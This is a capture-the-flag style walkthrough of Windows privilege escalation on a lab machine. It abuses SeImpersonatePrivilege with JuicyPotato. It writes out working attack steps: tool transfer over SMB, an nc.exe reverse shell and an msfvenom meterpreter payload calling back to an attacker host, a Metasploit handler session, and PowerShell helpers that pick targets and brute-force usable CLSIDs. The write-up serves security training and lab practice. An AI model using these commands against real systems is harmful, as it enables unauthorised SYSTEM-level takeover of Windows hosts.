Exploiting SeImpersonatePrivilege using JuicyPotato for privilege escalation
Let's take a scenario: we have an initial reverse shell, or a normal user shell, that needs to be elevated to Administrator. Checking the privileges of the current user, we notice that SeImpersonatePrivilege is enabled.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\SysWOW64\inetsrv>
The privilege below can be exploited with JuicyPotato (the ohpe/juicy-potato release page on GitHub) on most Windows versions that JuicyPotato supports. SeAssignPrimaryTokenPrivilege would also do, but here only SeImpersonatePrivilege is enabled.
SeImpersonatePrivilege Impersonate a client after authentication Enabled
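As an added example (not code from the original post), here is a PowerShell triage helper that applies the two checks this section relies on before any tooling is copied over: is SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled in `whoami /priv`, and is the OS build one that JuicyPotato still works on. The function name, parameter names and the sample lines are my own; the build threshold comes from the JuicyPotato README, which states that it does not work on Windows 10 1809 (build 17763) and later or on Server 2019.

```powershell
# Added example, not part of the original post. Names and the sample
# text are constructed; the build cut-off is from the JuicyPotato README.
function Test-JuicyPotatoCandidate {
    param(
        [Parameter(Mandatory)] [string[]] $WhoamiPriv,  # lines of `whoami /priv`
        [Parameter(Mandatory)] [int]      $Build        # OS build, e.g. 15063
    )

    # Either privilege lets JuicyPotato use the token it captures.
    $wanted  = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
    $enabled = @()
    foreach ($line in $WhoamiPriv) {
        # table rows look like: "<PrivilegeName> <Description> <State>"
        if ($line -match '^(Se\w+Privilege)\s.*\s(Enabled|Disabled)\s*$') {
            if (($wanted -contains $Matches[1]) -and ($Matches[2] -eq 'Enabled')) {
                $enabled += $Matches[1]
            }
        }
    }

    # JuicyPotato stops working at Windows 10 1809 (build 17763) / Server 2019.
    $buildOk = $Build -lt 17763

    [pscustomobject]@{
        EnabledPrivileges = $enabled
        BuildSupported    = $buildOk
        TryJuicyPotato    = (($enabled.Count -gt 0) -and $buildOk)
    }
}

# Constructed sample input in the shape of the `whoami /priv` output above.
$sample = @(
    'SeAssignPrimaryTokenPrivilege Replace a process level token Disabled',
    'SeChangeNotifyPrivilege Bypass traverse checking Enabled',
    'SeImpersonatePrivilege Impersonate a client after authentication Enabled'
)
Test-JuicyPotatoCandidate -WhoamiPriv $sample -Build 15063

# On a live host, feed it the real output and build number:
# Test-JuicyPotatoCandidate -WhoamiPriv (whoami /priv) `
#     -Build ([int](Get-CimInstance Win32_OperatingSystem).BuildNumber)
```

For the box in this post (build 15063, SeImpersonatePrivilege enabled) the result is TryJuicyPotato = True; on a 1809+ box the same privilege would be present but BuildSupported would be False, which is the case the Practical Notes at the end warn about.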
The JuicyPotato executable can be downloaded to the Kali machine and transferred to Windows by any method. I am using an SMB share here.
On the Kali machine (where the JuicyPotato file is present), start an SMB server
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
On Windows (destination), use the commands below to copy the executable
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/10/2018 23:07 Administrator
d----- 12/10/2018 23:12 DefaultAppPool
d----- 12/10/2018 20:16 Destitute
d-r--- 12/10/2018 20:08 Public
d----- 12/10/2018 23:54 test
d----- 12/10/2018 23:40 WWW Anon Access
cd Destitute
cd Documents
net use \\10.10.14.12\share /u:df df
The command completed successfully.
copy \\10.10.14.12\share\JuicyPotato.exe JuicyPotato.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully
In my earlier experience I had trouble running JuicyPotato from PowerShell; it is easier to get it to execute from a normal command prompt, so I have also copied nc.exe to Windows to get one. You can try running it from PowerShell first for testing.
Locate nc.exe on Kali and copy it to the folder that the SMB server is serving
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ ls
Invoke-PowerShellTcp.ps1 JuicyPotato.exe nc.exe
On Windows, copy the file to a directory you can write to:
copy \\10.10.14.12\share\nc.exe nc.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
-a---- 03/03/2022 00:23 59392 nc.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully.
.\nc.exe -e cmd.exe 10.10.14.12 8989
With a normal command shell back on the listener, run systeminfo to get the OS edition and build; these determine which CLSID list applies.
$ nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.116] 49679
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\Destitute\Documents>systeminfo
systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 02/03/2022, 00:21:13
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,060 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,211 MB
Virtual Memory: In Use: 988 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::e97c:8980:56ae:4cc9
[03]: dead:beef::7593:12e5:4a97:139c
[04]: dead:beef::69d7:5f30:5fa5:e0af
[05]: dead:beef::e97c:8980:56ae:4cc9
[06]: dead:beef::4d
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
First I tried without specifying a CLSID. JuicyPotato then falls back to its built-in default (BITS, {4991d34b-80a1-4291-83b6-3328366b9097}), and it failed with error 10038 (WSAENOTSOCK), which is what you see when the COM object for that CLSID never connects back to JuicyPotato's listener, so there is no token to steal.
Directory of C:\Users\Destitute\Documents
03/03/2022 00:41 <DIR> .
03/03/2022 00:41 <DIR> ..
03/03/2022 00:07 347,648 JuicyPotato.exe
03/03/2022 00:23 59,392 nc.exe
03/03/2022 00:41 56 rev.bat
3 File(s) 407,096 bytes
2 Dir(s) 9,699,618,816 bytes free
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555
JuicyPotato.exe -t * -p rev.bat -l 5555
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 5555
COM -> recv failed with error: 10038
I then tried another CLSID from the list in the juicy-potato repository (the CLSID directory on GitHub). It failed the same way, because that CLSID is not usable on this system.
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555 -c {9E175B9C-F52A-11D8-B9A5-505054503030}
JuicyPotato.exe -t * -p rev.bat -l 5555 -c {9E175B9C-F52A-11D8-B9A5-505054503030}
Testing {9E175B9C-F52A-11D8-B9A5-505054503030} 5555
COM -> recv failed with error: 10038
With the correct CLSID it works. In the final section I explain how to find the correct CLSID.
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p rev.bat -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 5555
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
However, no reverse shell came back. Note that "[+] CreateProcessWithTokenW OK" only confirms that the process was created with the SYSTEM token; what it does afterwards is not checked. The content of rev.bat is not shown here, but a likely cause is a relative path to nc.exe: the prompt of the SYSTEM shell obtained below shows that the process JuicyPotato spawns starts in C:\Windows\system32 rather than in the directory JuicyPotato was run from, so a bare nc.exe in the batch file would not be found. Give -p (and anything the program launches) absolute paths. Instead of nc.exe I generated an msfvenom reverse shell, repeated the same process with the working CLSID, and got the privileged shell.
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=5555 --arch x64 -f exe -o backdoor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
On Windows I used the same file transfer technique to copy the reverse shell executable. Run the multi/handler or a netcat listener on Linux, then run JuicyPotato with the newly transferred reverse shell. The -l option is the port on which JuicyPotato's COM server listens on the Windows host (127.0.0.1 by default); it can be any free local port and has nothing to do with the reverse shell port. I used 5555 for both to keep it simple, which only works because the two listeners are on different hosts.
c:\Users\Destitute>cd Documents
cd Documents
c:\Users\Destitute\Documents>net use \\10.10.14.12\share /u:df df
net use \\10.10.14.12\share /u:df df
The command completed successfully.
c:\Users\Destitute\Documents>copy \\10.10.14.12\share\backdoor.exe backdoor.exe
copy \\10.10.14.12\share\backdoor.exe backdoor.exe
1 file(s) copied.
c:\Users\Destitute\Documents>JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 5555
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
Privileged shell as "nt authority\system"
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:5555
[*] Sending stage (200262 bytes) to 10.10.10.116
[*] Meterpreter session 1 opened (10.10.14.12:5555 -> 10.10.10.116:49701) at 2022-03-02 20:05:32 -0500
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 4540 created.
Channel 1 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd c:\users\Administrator
cd c:\users\Administrator
c:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of c:\Users\Administrator
12/10/2018 22:07 <DIR> .
12/10/2018 22:07 <DIR> ..
12/10/2018 19:17 <DIR> Contacts
17/03/2021 16:01 <DIR> Desktop
12/10/2018 19:17 <DIR> Documents
17/03/2021 16:01 <DIR> Downloads
12/10/2018 19:17 <DIR> Favorites
12/10/2018 19:17 <DIR> Links
12/10/2018 19:17 <DIR> Music
17/03/2021 15:10 <DIR> OneDrive
12/10/2018 19:17 <DIR> Pictures
12/10/2018 19:17 <DIR> Saved Games
12/10/2018 19:17 <DIR> Searches
12/10/2018 19:17 <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 9,699,082,240 bytes free
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of c:\Users\Administrator\Desktop
17/03/2021 16:01 <DIR> .
17/03/2021 16:01 <DIR> ..
12/10/2018 22:57 32 proof.txt
1 File(s) 32 bytes
2 Dir(s) 9,699,082,240 bytes free
How to get the correct CLSID
A CLSID is the globally unique identifier of a COM class in Windows; for details refer to the CLSID Key page in the Microsoft Win32 docs. Candidate CLSIDs are listed per operating system in the juicy-potato repository (the CLSID/Windows_10_Enterprise directory on GitHub matches this box), and you can try some at random. Alternatively, a script can test each CLSID and report the ones that hand back a usable token. Copy these two files to the Windows machine:
Test script: test_clsid.bat (tcprks/Rchitect on GitHub)
CLSID list: CLSID.list (tcprks/Rchitect on GitHub). The list differs by Windows version, so match it to the version shown by systeminfo; see the CLSID directory of the juicy-potato repository.
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ head -5 CLSID.list
{BA7C0D29-81CA-4901-B450-634E20BB8C34}
{8C334A55-DDB9-491c-817E-35A6B85D2ECB}
{A5065670-136D-4FD6-A45F-00C85B90359C}
{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF}
{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB}
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ head -5 test_clsid.bat
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
Use any Windows file transfer method to get these files onto the Windows machine. Once transferred, run the .bat file and look in result.log for CLSIDs whose token is "NT AUTHORITY\SYSTEM". Full results are uploaded here.
.\test_clsid.bat
{BA7C0D29-81CA-4901-B450-634E20BB8C34} 10000
{8C334A55-DDB9-491c-817E-35A6B85D2ECB} 10000
{A5065670-136D-4FD6-A45F-00C85B90359C} 10000
{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF} 10000
{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} 10000
{924DC564-16A6-42EB-929A-9A61FA7DA06F} 10000
{3631271D-DDD3-40f2-AC17-B13A3742BA62} 10000
{217700E0-2001-11DF-ADB9-F4CE462D9137} 10000
{3480A401-BDE9-4407-BC02-798A866AC051} 10000
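As an added example (not the original post's script, nor the one from the tcprks/Rchitect repository), here is a PowerShell equivalent of the test_clsid.bat loop described above: it walks CLSID.list, runs JuicyPotato in its -z mode ("only test CLSID and print token's user") on a fresh local port for each entry, appends the output to result.log and returns the CLSIDs that yielded a SYSTEM token. The function name, default file names and the port range are my own choices; the -z, -l and -c flags are JuicyPotato's documented options.

```powershell
# Added example, not part of the original post. Assumes JuicyPotato.exe and
# CLSID.list are in the current directory; file names are assumptions.
function Find-SystemClsid {
    param(
        [string] $ClsidList = '.\CLSID.list',
        [string] $Juicy     = '.\JuicyPotato.exe',
        [int]    $StartPort = 10000,
        [string] $ResultLog = '.\result.log'
    )

    $port = $StartPort
    $hits = @()
    foreach ($raw in Get-Content $ClsidList) {
        $clsid = $raw.Trim()
        # skip blank lines and anything that is not a {GUID}
        if (-not $clsid -or -not $clsid.StartsWith('{')) { continue }

        # -z: only test this CLSID and print "<clsid>;<token user>"
        $output = (& $Juicy -z -l $port -c $clsid 2>&1 | Out-String)
        Add-Content -Path $ResultLog -Value "$clsid $port`r`n$output"

        # A usable CLSID prints the account of the token it handed over.
        if ($output -match 'NT AUTHORITY\\SYSTEM') {
            $hits += $clsid
            Write-Host "[+] $clsid -> NT AUTHORITY\SYSTEM"
        }

        # fresh COM port per attempt so a hung listener never blocks the next test
        $port++
    }
    return $hits
}

# Usage: run it, then feed a hit to
#   JuicyPotato.exe -t * -p <absolute path to payload> -l <port> -c <clsid>
$systemClsids = Find-SystemClsid
$systemClsids
```

If JuicyPotato misbehaves under PowerShell on a given host, as it did for the author, launch this from a PowerShell started inside the cmd.exe shell obtained with nc.exe; the loop itself only shells out to JuicyPotato.exe and reads its output, so it does not change how the tool runs.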
Try the JuicyPotato command with one of the CLSIDs that returned "NT AUTHORITY\SYSTEM".
Testing with one more CLSID than the one we tried earlier:
Directory of C:\users\Destitute\Documents
04/03/2022 00:26 <DIR> .
04/03/2022 00:26 <DIR> ..
03/03/2022 01:00 7,168 backdoor.exe
03/03/2022 01:16 28,640 CLSID.list
03/03/2022 01:19 1,580 GetCLSID.ps1
03/03/2022 01:20 259 getclsidtest.ps1
03/03/2022 00:07 347,648 JuicyPotato.exe
03/03/2022 00:23 59,392 nc.exe
04/03/2022 00:42 4,657 result.log
09/03/2021 20:08 285 test_clsid.bat
8 File(s) 449,629 bytes
2 Dir(s) 9,719,095,296 bytes free
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
Testing {d20a3293-3341-4ae8-9aaf-8e397cb63c34} 5555
......
[+] authresult 0
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
We got reverse shell as “nt authority\system”
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:5555
[*] Sending stage (200262 bytes) to 10.10.10.116
[*] Meterpreter session 2 opened (10.10.14.12:5555 -> 10.10.10.116:50774) at 2022-03-03 20:18:49 -0500
meterpreter > shell
Process 4920 created.
Channel 1 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Practical Notes:
Make sure the operating system is listed as supported on the JuicyPotato page even if you see SeImpersonatePrivilege enabled: JuicyPotato does not work on Windows 10 1809 (build 17763) and later or on Windows Server 2019, while this box is build 15063 (Windows 10 1703). The exploit has issues on some systems when run from PowerShell; if it does not work from PowerShell, get a command prompt with nc.exe as shown above. Sometimes you do not need to find a specific CLSID and the default one works; if not, you have to find a CLSID that JuicyPotato can use on that Windows version. The payload can be a reverse shell via nc.exe or an msfvenom-generated executable; in this case nc.exe did not work, so I used msfvenom. Keep in mind that "CreateProcessWithTokenW OK" only confirms the process was created as SYSTEM, so give -p (and -a) absolute paths and judge success by the listener, not by the JuicyPotato output. Some automatic CLSID scripts (GetCLSID.ps1 in the tcprks/Rchitect repository on GitHub) did not help me in this case either. I got a simpler version from research on the internet, shared as test_clsid.bat in the same repository; for that script to work, the CLSID.list for the corresponding Windows version must be in the same folder from which you run the script.